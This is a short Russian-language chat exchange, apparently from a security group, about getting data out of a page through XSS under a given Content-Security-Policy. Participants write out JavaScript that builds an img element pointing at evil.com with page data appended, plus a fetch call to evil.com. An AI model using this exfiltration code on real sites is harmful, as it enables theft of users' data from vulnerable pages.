помощи xss кроме как через кучу тегов img?
default-src 'self' https://*.googleapis.com https://*.gstatic.com ;
script-src * 'self' 'unsafe-inline' 'unsafe-eval';
img-src * data: ;
style-src 'self' https://*.googleapis.com https://*.gstatic.com 'unsafe-inline';
Есть такая удобная штука https://csp-evaluator.withgoogle.com/
а почему через кучу? я правильно понял, что есть xss, код исполняется, и нужно какие-то данные со страницы эксфильтрануть вовне? картинки разрешены откуда угодно, что мешает сделать el = document.createElement('img'); el.src = '//evil.com/' + data1 + data2 + data3 ?
О, спасибо
только забыл еще в конце document.body.appendChild(el);
fetch('https://evil.com/‘)
Речь идет о байпасе csp для img. Для fetch там стоит self
Обсуждают сегодня